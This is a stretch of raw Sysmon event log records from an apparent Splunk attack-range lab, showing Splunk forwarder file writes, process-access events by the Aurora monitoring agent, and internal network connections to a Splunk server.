Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE271BD1519A0259E7F7E216BF115670,SHA256=1863FFAB2E2ADB38AE7BFBEE2C08568437B11788F6B7950B27FF95FB1551B7C1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017886Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:12.115{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2720BA4283C5120C1853277AA6F93EA,SHA256=D8957A288F7EF274374B9C585108EA3DE1AE40EED621CDD846D8710741530D41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045513Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:13.277{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EBF1886642F6C2B64122CC845901D70,SHA256=DEC4277EF843B6B8CBF37F94DF29A77AEDCFB7213EE2A72D22D61253DF5557AC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017887Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:13.202{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD074913505AF307391EAAEFBF799D7E,SHA256=4216D271ECD0BAEC532ADBBF088096D60C1C1425559D0C89DEC5C8A4C52B07AC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045542Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.899{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045541Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.895{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045540Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.885{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045539Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.884{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045538Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.883{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045537Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.883{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045536Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.881{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000045535Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.877{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=1E685BCAEE26C37DB15DBD714A7BBAE0,SHA256=98EE32BBEBD8A8F1895044106E67F2967233FCE90E6A1289ED7705034F0B7183,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045534Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.874{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000045533Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.868{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=80FD8D6A46CFBF967642D9849CE93F7E,SHA256=F18831080D41C0A762B8CA8A7E1E5DE815626B2FAA8F1801796C1DA5A9945B36,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045532Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.862{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045531Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.833{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045530Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.826{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045529Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.817{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045528Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.813{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045527Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.811{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045526Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.809{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045525Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.805{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045524Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.803{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045523Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.802{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045522Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.798{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045521Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.797{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045520Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045519Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.795{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045518Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.793{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000045517Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.370{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D36359B025F95EC8F87BC3B4271AA816,SHA256=9F24FBE226A142FCFCFD071738EFABC3E6DB518141A39610D743BB72195891F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017889Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:12.968{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50157-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017888Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:14.279{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59C267EE1C601834B15B424D7F66C1B3,SHA256=83315511061B50DE559E9F08B9F768B61DFAD45D8E2135C7BD60F559A773DDA7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045516Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.276{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045515Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:14.275{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 354300x800000000000000045514Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.573{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56428-false10.0.1.12-8000- 